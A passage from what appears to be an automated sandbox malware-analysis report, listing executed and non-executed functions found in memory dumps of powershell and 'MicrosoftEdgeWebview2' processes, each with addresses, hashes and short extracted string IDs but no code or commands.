              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 33E04F31B0C9089FDAB8DA4CE0519E977E1EFA8331B1202BBD14EC7571CA22ED51CB81

              Non-executed Functions

              Function 00007FFD9B6D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
              • API String ID: 0-1415242001
              • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
              • Instruction ID: 60e513dcc1508e9cb8116ea7ef1f28b002582ff0594fe0830d677862ff448b96
              • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
              • Instruction Fuzzy Hash: C821D473B045154AC30637ADB8529EE7B80DF9437838562F3E629CF597DF24A48B8A80

              Executed Functions

              Function 00007FFD9B786660 Relevance: .4, Instructions: 393COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfc5e41a9e8d5548116318501d9949eb2332d601c0566e1267fa17deead8583b
              • Instruction ID: 569ca066049e395f35a2399278a5a770a55f879ead383ced662b662a0a293836
              • Opcode Fuzzy Hash: bfc5e41a9e8d5548116318501d9949eb2332d601c0566e1267fa17deead8583b
              • Instruction Fuzzy Hash: 4CC15872B0EF8E1FEBA5EAA858A55797BD1EF15311B0902BED45DC70F3DA24E8008341
              Function 00007FFD9B6BA71C Relevance: .3, Instructions: 335COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8eb2ad80486685a606b294f4eabc5069d4601ef5f3d51a352c326ffdea0e8d06
              • Instruction ID: 797495999add34aa7756eae6e13348f405708522503b8984824c2938cf3879f2
              • Opcode Fuzzy Hash: 8eb2ad80486685a606b294f4eabc5069d4601ef5f3d51a352c326ffdea0e8d06
              • Instruction Fuzzy Hash: 75A14A3160EB894FD71ADB6CC8A55A47BF0EF56314B0901BFC099CB1A3DE256847CB52
              Function 00007FFD9B6B9728 Relevance: .1, Instructions: 142COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fbe68b8246412924653614d3019c74c08fb60248365b2ab36ba8607b6a7b04db
              • Instruction ID: d6640528586d6e23e4fa3d19fcc278546282f522e21cf34ffae55ae4ef3fa9be
              • Opcode Fuzzy Hash: fbe68b8246412924653614d3019c74c08fb60248365b2ab36ba8607b6a7b04db
              • Instruction Fuzzy Hash: 21415A7191DB8C8FDB189F5C980A6B9BBE0FB95310F04816FE45883292DB74B945CBC2
              Function 00007FFD9B59EAA8 Relevance: .1, Instructions: 123COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1996480783.00007FFD9B59D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B59D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b59d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ce3c46d71356aa5a3939bc4ab824d81c3ed6dab2f986cfd28f29aa75d880091
              • Instruction ID: cacf19409f0b950a1c3e7d4013abeb75532df1463295f56eca668fbd1146ecd2
              • Opcode Fuzzy Hash: 7ce3c46d71356aa5a3939bc4ab824d81c3ed6dab2f986cfd28f29aa75d880091
              • Instruction Fuzzy Hash: 2241177150EBC48FD7578B3898959523FF0EF57220B1A06DFD088CB1A3D625A84AC792
              Function 00007FFD9B6BA030 Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8db09c195e6da6adcd40a886bf5095956b4b02f100f993babd7de62974935fcb
              • Instruction ID: fcd2180e0aac97f0240a23aefaaa58913d2fb940b921474ae8ac63b26d959ac4
              • Opcode Fuzzy Hash: 8db09c195e6da6adcd40a886bf5095956b4b02f100f993babd7de62974935fcb
              • Instruction Fuzzy Hash: BD313B7690EAD94FDB269B7C88654E57FB0EF11704B0A01FBD0E88F0A3EE1465598781
              Function 00007FFD9B786806 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa072a55fa4fc61690c01b24efe699ec25ba4940d13dd4a025b7aa64b6008d38
              • Instruction ID: db296f8f4ead9adafffa547e8a8b93520f85dcb8ad3473f43217fa4ad284c59c
              • Opcode Fuzzy Hash: aa072a55fa4fc61690c01b24efe699ec25ba4940d13dd4a025b7aa64b6008d38
              • Instruction Fuzzy Hash: 8511E271B0EB8E9FEBA4DA98A0E46787781DF48312F1542BEC04DE71E7C925A8058351
              Function 00007FFD9B6B33B5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
              • Instruction ID: 21445a0841d7e35a1e69ec8328e2c92e44b6098ee529c1b6e8647e908ff35827
              • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
              • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE051AA6B3E0FB85364F50056EE58AC36A1DA32E882CB41
              Function 00007FFD9B78414D Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
              • Instruction ID: 386fc338cf5dd25e658c709f1df643f7fa27211331a462611e4b2d3d4a21a843
              • Opcode Fuzzy Hash: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
              • Instruction Fuzzy Hash: A5F0B432B0DA098FD769EA4CE4918A873E0EF55321B1200BAE05DC71B7CA35EC40C745
              Function 00007FFD9B784400 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
              • Instruction ID: e4e321b789c69c2086875d9fcb3bb0f945959a61bbb33625e4fe80491fbc3e32
              • Opcode Fuzzy Hash: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
              • Instruction Fuzzy Hash: BBF0BE32A0EA498FD764EA4CE0A48A8B3E0FF05321B0200BAE05DC70B3CA35AC40C740
              Function 00007FFD9B7841D1 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000007.00000002.1998213795.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b780000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: ffff31fa2cf165b37673aa0698ebfb6d308539014c5d3b066ef123b33c81593e
              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 4CE01231B0C9089FD679DA4CE0919A973E1EB98322B1102BBD14EC7571C631ED518B80

              Non-executed Functions

              Function 00007FFD9B6B89FA Relevance: 6.4, Strings: 5, Instructions: 165COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: N_^$N_^$N_^$N_^$N_^
              • API String ID: 0-2528851458
              • Opcode ID: 348b6759718a9745e4e4c327f988ca68952b95a07e6d2c3e6fb49cad8ae0962d
              • Instruction ID: 1063a3eada181f5a5b27ced664c966e136155ec361d6195e0c2cfd909a3039d8
              • Opcode Fuzzy Hash: 348b6759718a9745e4e4c327f988ca68952b95a07e6d2c3e6fb49cad8ae0962d
              • Instruction Fuzzy Hash: 4351AC62B0F6E65FE72646698C7A4857FB0FF1225470A42FBC1A4CF0A3ED1879478742
              Function 00007FFD9B6B8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000007.00000002.1997262427.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_7ffd9b6b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
              • API String ID: 0-4116931533
              • Opcode ID: b5ad6c974f4b65a3938aa6a011e35daee5e7f7d819d9c44f84fd1af324a4e300
              • Instruction ID: 864b328537572512b6b8bafdbcb1cf3ff8d569b53acd9fa6510c796b15503245
              • Opcode Fuzzy Hash: b5ad6c974f4b65a3938aa6a011e35daee5e7f7d819d9c44f84fd1af324a4e300
              • Instruction Fuzzy Hash: 0F21FEA77084265FD30677EDBC209D96B80DFA42B678802B3D368CF643DE24608B87C1

              Executed Functions

              Function 00007FFD9B6D12B9 Relevance: .8, Instructions: 808COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5bbbc4cb28de361a2f1512ff35e6b727b0b1777402ad2ad1fa34e92dd7a21b73
              • Instruction ID: 5d5202429e8b4493a6db79938acd4f645fe3fbe6554dae81f7555b3f65591b3b
              • Opcode Fuzzy Hash: 5bbbc4cb28de361a2f1512ff35e6b727b0b1777402ad2ad1fa34e92dd7a21b73
              • Instruction Fuzzy Hash: 1C421821B19A094FE7A8EB7C88756B977D2FFD8740F4406B9E41EC72D6DE28B8018741
              Function 00007FFD9B6D1C4D Relevance: .2, Instructions: 195COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6915542e66c195e14ad402df0ec522f6759a8e786b03c3616b8bf912cc2753f
              • Instruction ID: a16412cecd7307c7ebd8f19594a881dd16c11ad86e9a4c3386629b23db83b5bc
              • Opcode Fuzzy Hash: b6915542e66c195e14ad402df0ec522f6759a8e786b03c3616b8bf912cc2753f
              • Instruction Fuzzy Hash: 4551FF21B0E6C90FD79AABB848756757FE1DF97219B0801FAE09DCB1E7DD486806C342
              Function 00007FFD9B6D0C2E Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d07f08b0344ad690df8194355874d0fdca399e82dcc8b40b3587d7bcf0f95bc
              • Instruction ID: a374a65b3fc495e71be811f7b56bd2d062a6b477502f0441192c63068c130d79
              • Opcode Fuzzy Hash: 9d07f08b0344ad690df8194355874d0fdca399e82dcc8b40b3587d7bcf0f95bc
              • Instruction Fuzzy Hash: C8914522F0EA8E0FEB95A7788C715F97BE1EFC6210B4901B7D459CB1E7DD2868028341
              Function 00007FFD9B6D04D8 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 032a4463790b56472732dea3fb6273d1bfbaaf01cbad8cb2f4860f4a6bf2d8e9
              • Instruction ID: cae1940819757af82464f839f81d9039db8e2a624eceafc8039a30e923f8bb06
              • Opcode Fuzzy Hash: 032a4463790b56472732dea3fb6273d1bfbaaf01cbad8cb2f4860f4a6bf2d8e9
              • Instruction Fuzzy Hash: A431E421B199490FE79CEB6C886A679B7C2EFD8345F0401BEE05EC32EBDD64AC418341
              Function 00007FFD9B6D0AC9 Relevance: .1, Instructions: 124COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f897eec74cb59a92259f822732eedf31ba0f8bcdfc1168c1a87c7cdf032ead1a
              • Instruction ID: 2c1625b37f09108bf062fdb0ce7af339d3deb9ddab92c22a53254af021860c78
              • Opcode Fuzzy Hash: f897eec74cb59a92259f822732eedf31ba0f8bcdfc1168c1a87c7cdf032ead1a
              • Instruction Fuzzy Hash: 0431E321B1990A4FE798BBBC5C397B977D2EFD8601F4403BAE41CC72D6DE2868018381
              Function 00007FFD9B6D0985 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8cbdf3190f7b67216c8180065e085744ad0c751d27380db6d0670eb6d9f95ec5
              • Instruction ID: 160e58c90fc7b69c1d93b14ceaaa22726e0c5baf5b70a9ee3cf01a855760a7bd
              • Opcode Fuzzy Hash: 8cbdf3190f7b67216c8180065e085744ad0c751d27380db6d0670eb6d9f95ec5
              • Instruction Fuzzy Hash: 4C319131F18A1E4FEB44EBA888756EDB7A1FF98340F8006B5D519DB2C6DE38B8018740
              Function 00007FFD9B6D0848 Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 132a7a620f0943814054864f7d21e57ae4a63d68ad30096c69b64d4ddd862faf
              • Instruction ID: 3e7dfca2cececdd46c65e0a50dc45c753d650d87c86b831dd7b7db255a7cfbfe
              • Opcode Fuzzy Hash: 132a7a620f0943814054864f7d21e57ae4a63d68ad30096c69b64d4ddd862faf
              • Instruction Fuzzy Hash: A321CE35BA89095FD785EB7890A18A9BF71FF89380BC046E9ED19C73CAED3469008750
              Function 00007FFD9B6D1E01 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d5f07ac136eecd7c24496853c90c61efdce224b478d7d10b1d0c40c082871bcd
              • Instruction ID: d17a880d50f2de02198d2ec9503cc55a13b1d9fe08233a3cb9e5859ce9262038
              • Opcode Fuzzy Hash: d5f07ac136eecd7c24496853c90c61efdce224b478d7d10b1d0c40c082871bcd
              • Instruction Fuzzy Hash: AC014711A0DAC80FE791673C6C754757FE1CFD2760B0906AAE8ACCB0E3D8447A818381

              Non-executed Functions

              Function 00007FFD9B6D0710 Relevance: 5.1, Strings: 4, Instructions: 86COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2271438090.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: M_^ $M_^"$M_^$$M_^&
              • API String ID: 0-3382453705
              • Opcode ID: 6dc589e6ee095e8dae018908f6738f57f50834629b14eb364ae1cab5490db7ef
              • Instruction ID: 0c63d22eb577c50e4f736a3c35f9493b341e9ea6912ecb29945edefe481a3df2
              • Opcode Fuzzy Hash: 6dc589e6ee095e8dae018908f6738f57f50834629b14eb364ae1cab5490db7ef
              • Instruction Fuzzy Hash: 8221F4A7A0A0958AE2122BA86CB64EC3F90DF4161C78943F6C4F9CE0E3FD18714AC644

              Executed Functions

              Function 00007FFD9B6B12B9 Relevance: .8, Instructions: 808COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e7e015d9d9eb790c5ef810652f1af24f9d38206db483912fad84e42ecf3b56c
              • Instruction ID: fcb705609c9d8ba1e7ad2e9d037477279184fcce2d831a64076a34ef11f9e593
              • Opcode Fuzzy Hash: 1e7e015d9d9eb790c5ef810652f1af24f9d38206db483912fad84e42ecf3b56c
              • Instruction Fuzzy Hash: 51420621B2DA194FE7A8EB7C84796B977E2FF98300F410579E41EC72D6DE28B9018741
              Function 00007FFD9B6B1C4D Relevance: .2, Instructions: 195COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22d2df978a6e72c41f5d65976f17088e0f536872bdd3dad0ba5bae621857eff5
              • Instruction ID: b86681a8b1a6c11156898e222116313f833f70df00ec4109388adc7ebdf81520
              • Opcode Fuzzy Hash: 22d2df978a6e72c41f5d65976f17088e0f536872bdd3dad0ba5bae621857eff5
              • Instruction Fuzzy Hash: E351F111B1E6C90FD79AABB848756757FE1DF97219B0800FAE09DCB1E7DD086806C342
              Function 00007FFD9B6B0C2E Relevance: .8, Instructions: 773COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edb76b5748eba5a67aeb5d151b0e692cec2dc5f8f6edd9bc49ba1adaa39b43b4
              • Instruction ID: caeec50be2a42725b1ea8cac0078bff529e423b62d2c982cfab3e63be7a15062
              • Opcode Fuzzy Hash: edb76b5748eba5a67aeb5d151b0e692cec2dc5f8f6edd9bc49ba1adaa39b43b4
              • Instruction Fuzzy Hash: BB918822F0EA9A0FE795A76C98611F87FF1EF86210B4900B7D059CB1E7DE287C468751
              Function 00007FFD9B6B04D8 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 12131d68a7a74dca6b553f0eb9309d80b517ef96bd71194baabaefa5a8db0c3f
              • Instruction ID: 58eafed386ffddffb6c607881fdb2eddda84edf858e53fc4c3d0f1e7438bc72f
              • Opcode Fuzzy Hash: 12131d68a7a74dca6b553f0eb9309d80b517ef96bd71194baabaefa5a8db0c3f
              • Instruction Fuzzy Hash: EB310221B1D9490FE79CEB6C846A679B7D2EF98345F0401BEE05EC32EBDD68AC418341
              Function 00007FFD9B6B0AC9 Relevance: .1, Instructions: 124COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction ID: 885e5a0fea639032a052f269dcaea601df7ebd4501dd46d441fad32984016ee8
              • Opcode Fuzzy Hash: f56d7957fc958d2009eb9fe3e530472d60e962cd929bcc8c2872a14bd265f66b
              • Instruction Fuzzy Hash: E6310611B199190FE798BBBC58297B977D2EFD8701F4402BBE41CC72D7DE2868418791
              Function 00007FFD9B6B0985 Relevance: .1, Instructions: 111COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0cbdcaf2925b774edbaa4cfddcb8a0941cd79024f40834414653feac8cabb366
              • Instruction ID: a4336ed573413f98111ed06c74b4a2b09861750f03f51cced42124d019fe82b7
              • Opcode Fuzzy Hash: 0cbdcaf2925b774edbaa4cfddcb8a0941cd79024f40834414653feac8cabb366
              • Instruction Fuzzy Hash: 36318F35B1891A4FEB44EBA88475AEDB7E1FF98300F8005B9D419D72C6DE38B9018B51
              Function 00007FFD9B6B088C Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2d24ed78ff8f13d05ef452a9a65353aa54c412be5ade2c995d671c2dc6432a92
              • Instruction ID: b7b82e749add6b988c7f0c882a429c1893f62aa0c3a9470c4b5add68228a8bfd
              • Opcode Fuzzy Hash: 2d24ed78ff8f13d05ef452a9a65353aa54c412be5ade2c995d671c2dc6432a92
              • Instruction Fuzzy Hash: 49216879B64D0D5FD744EB5890A59A9BFF2FF89200FD044A8D819C73CADE3C69048751
              Function 00007FFD9B6B1E01 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81d3e78ce8d35803c3dfb44eca2c4b8f610711e5ec7a0d24fa8bbc1f7c2d285d
              • Instruction ID: 09fb833df99a257ae8fbc6946c966ec4c33ba5fc03f875cb79983bcdb4197aab
              • Opcode Fuzzy Hash: 81d3e78ce8d35803c3dfb44eca2c4b8f610711e5ec7a0d24fa8bbc1f7c2d285d
              • Instruction Fuzzy Hash: B3017B05E0DAE41FE7A1A73C68754757FF1CF92320B0905ABE4A8CF0E7D8087A428782

              Non-executed Functions

              Function 00007FFD9B6B0710 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000010.00000002.2337109104.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: O_^ $O_^"$O_^$$O_^&
              • API String ID: 0-3636004760
              • Opcode ID: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction ID: 3a184c77386bbf4aa69513a3d76d5a616a8868164c12500c2b36bd44a76674bd
              • Opcode Fuzzy Hash: 5e6cb523706a7bccc332836f987ab8406d593c89340c44bd1b8a2f9fea38ae47
              • Instruction Fuzzy Hash: 222124A3A0F1654EE31227B96CB14E87F609F0061C30941F6C0FE8E197EE18319A8A84

              Executed Functions

              Function 00007FFD9B6B12B9 Relevance: .8, Instructions: 812COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.2361724843.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_7ffd9b6b0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57db11478b6477c6847a1287c5746df231ad789298286a96bb477a59d6d291c8
              • Instruction ID: a07dc9b50897a35d98cce5680223b196aab34e36b7bc3f4de55f7f938cf6cf63
              • Opcode Fuzzy Hash: 57db11478b6477c6847a1287c5746df231ad789298286a96bb477a59d6d291c8
              • Instruction Fuzzy Hash: 23420821B2CA594FE7A8FB7C84696B9B7E1FF98300F400579E45EC72D6DE28B8018741
              Function 00007FFD9B6B1C4D Relevance: .2, Instructions: 195COMMON
              Download Yara Rule
              Memory Dump Source
